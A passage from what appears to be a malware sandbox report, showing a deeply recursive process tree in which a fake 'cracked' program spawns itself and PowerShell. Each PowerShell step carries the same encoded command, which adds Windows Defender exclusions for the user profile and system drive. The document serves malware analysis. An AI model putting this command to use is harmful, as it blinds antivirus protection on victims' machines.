        8⤵
        Executes dropped EXE
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        8⤵
        Loads dropped DLL
        
        PID:492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        9⤵
        Executes dropped EXE
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        9⤵
        Loads dropped DLL
        
        PID:828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        10⤵
        Executes dropped EXE
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        11⤵
        Executes dropped EXE
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        11⤵
        Loads dropped DLL
        
        PID:2276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        12⤵
        Executes dropped EXE
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        12⤵
        Loads dropped DLL
        
        PID:2512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        13⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        13⤵
        Executes dropped EXE
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        13⤵
        Loads dropped DLL
        
        PID:2868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        14⤵
        Executes dropped EXE
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        14⤵
        Loads dropped DLL
        
        PID:1656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        15⤵
        Executes dropped EXE
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        15⤵
        Loads dropped DLL
        
        PID:1932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        16⤵
        Executes dropped EXE
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        16⤵
        Loads dropped DLL
        
        PID:2188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        17⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        17⤵
        Executes dropped EXE
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        17⤵
        Loads dropped DLL
        
        PID:1688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        18⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        18⤵
        Executes dropped EXE
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        18⤵
        Loads dropped DLL
        
        PID:2872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        19⤵
        Loads dropped DLL
        
        PID:1804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        20⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        20⤵
        Executes dropped EXE
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        20⤵
        Loads dropped DLL
        
        PID:1160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        21⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        21⤵
        Executes dropped EXE
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        21⤵
        Loads dropped DLL
        
        PID:2416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        22⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:636
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        22⤵
        Executes dropped EXE
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        22⤵
        Loads dropped DLL
        
        PID:3020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        23⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        23⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        23⤵
        Loads dropped DLL
        
        PID:2316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        24⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        24⤵
        Executes dropped EXE
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        24⤵
        Loads dropped DLL
        
        PID:2448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        25⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        25⤵
        Executes dropped EXE
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        25⤵
        Loads dropped DLL
        
        PID:2092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        26⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        26⤵
        Executes dropped EXE
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        26⤵
        Loads dropped DLL
        
        PID:2832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        27⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        27⤵
        Executes dropped EXE
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        27⤵
        Loads dropped DLL
        
        PID:2492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        28⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        28⤵
        Executes dropped EXE
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        28⤵
        Loads dropped DLL
        
        PID:1972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        29⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        29⤵
        Executes dropped EXE
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        29⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        30⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        30⤵
        Executes dropped EXE
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        30⤵
        Loads dropped DLL
        
        PID:2652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        31⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1896
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        31⤵
        Executes dropped EXE
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        31⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        32⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:636
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        32⤵
        Executes dropped EXE
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        32⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
